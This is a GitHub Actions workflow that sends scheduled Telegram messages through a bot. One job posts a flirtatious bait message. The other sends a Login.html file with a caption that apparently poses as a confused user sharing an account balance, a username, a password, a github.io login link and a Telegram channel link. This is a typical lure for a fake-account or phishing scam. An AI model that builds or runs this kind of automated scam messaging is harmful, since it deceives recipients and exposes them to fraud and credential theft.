name: Send Message

on:
  schedule:
    - cron: '50 20 * * *'
    - cron: '50 1 * * *'
    - cron: '0 21 * * *'
    - cron: '0 2 * * *'
  workflow_dispatch:

jobs:
  send-greeting:
    runs-on: ubuntu-latest
    steps:
      - name: Send greeting
        env:
          BOT_TOKEN: ${{ secrets.BOT_TOKEN }}
          CHAT_ID: ${{ secrets.CHAT_ID }}
        run: |
          curl -s -X POST https://api.telegram.org/bot${BOT_TOKEN}/sendMessage \
          -d chat_id=${CHAT_ID} \
          -d text="Hi baby 😏 How's it going?%0AWhen are you going to come talk to me? 😘%0AI'm waiting... 💋"

  send-file:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Send HTML file
        env:
          BOT_TOKEN: ${{ secrets.BOT_TOKEN }}
          CHAT_ID: ${{ secrets.CHAT_ID }}
        run: |
          CAPTION=$'How does this work?\nI don\'t really understand.\nWhat am I supposed to do with this?\nPlease help.\n\nbalance: 3,970$\nusername: john371\npassword: 2525561\n\nLogin: https://log-000.github.io/\nhttps://t.me/illuminati300/36'
          curl -s -F document=@Login.html \
          -F chat_id=${CHAT_ID} \
          -F caption="$CAPTION" \
          https://api.telegram.org/bot${BOT_TOKEN}/sendDocument
